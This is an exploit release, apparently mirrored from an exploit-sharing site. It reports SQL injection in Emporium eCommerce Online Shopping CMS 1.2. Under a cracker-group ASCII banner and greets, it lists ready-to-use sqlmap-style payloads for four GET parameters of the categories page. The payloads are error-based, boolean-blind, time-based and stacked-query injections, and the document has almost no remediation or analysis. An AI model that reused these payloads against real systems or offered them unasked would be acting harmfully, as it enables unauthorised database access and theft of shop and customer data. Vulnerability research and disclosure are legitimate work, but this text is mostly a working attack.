Emporium eCommerce Online Shopping CMS 1.2 SQL Injection Vulnerability

🗓️ 21 Jul 2022 00:00:00Reported by CraCkErType
zdt🔗 0day.today👁 358 Views
Emporium eCommerce SQL Injection Vulnerability in CMS 1.
┌┌────────────────────────────────────────────────────────────────────────────────────┐
││                                  C r a C k E r                                    ┌┘
┌┘              T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────          From The Ashes and Dust Rises An Unimaginable crack....           ────┐
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                   [ Exploits ]                                    ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                     │ │                                         :
│  Website  : mybizcms.com                │ │                                         │
│  Vendor   : mybizcms                    │ │                                         │
│  Software : Emporium eCommerce -        │ │                                         │
│             Online Shopping CMS v 1.2   │ │ Emporium eCommerce                      │
│  Vuln Type: Remote SQL Injection        │ │                                         │
│  Method   : GET                         │ │ is a complete online                    │
│  Critical : High [░░▒▒▓▓██]             │ │ shopping platform for all your needs    │
│  Impact   : Database Access             │ │                                         │
│                                         │ │                                         │
│ ────────────────────────────────────────┘ └─────────────────────────────────────────│
│                           B4nks-NET irc.b4nks.tk #unix                             ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                     :
│  Release Notes:                                                                     │
│  ═════════════                                                                      │
│  Typically used for remotely exploitable vulnerabilities that can lead to           │
│  system compromise.                                                                 │
│                                                                                     │
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                   ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:
       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
     loool, DevS, Dark-Gost
       CryptoJob (Twitter) twitter.com/CryptozJob
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                 © CraCkEr 2022                                    ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘

There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories?


GET parameter 'min_price' is vulnerable

---
Parameter: min_price (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41
---

GET parameter 'percentage' is vulnerable.

---
Parameter: percentage (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)
    Payload: percentage=MAKE_SET(4728=4728,5649)

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)
---

GET parameter 'review_ratings' is vulnerable

---
Parameter: review_ratings (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)
---

GET parameter 'brand[]' is vulnerable

---
Parameter: brand[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: brand[]=15');SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc
---
21 Jul 2022 00:00Current
0.3Low risk
Vulners AI Score0.3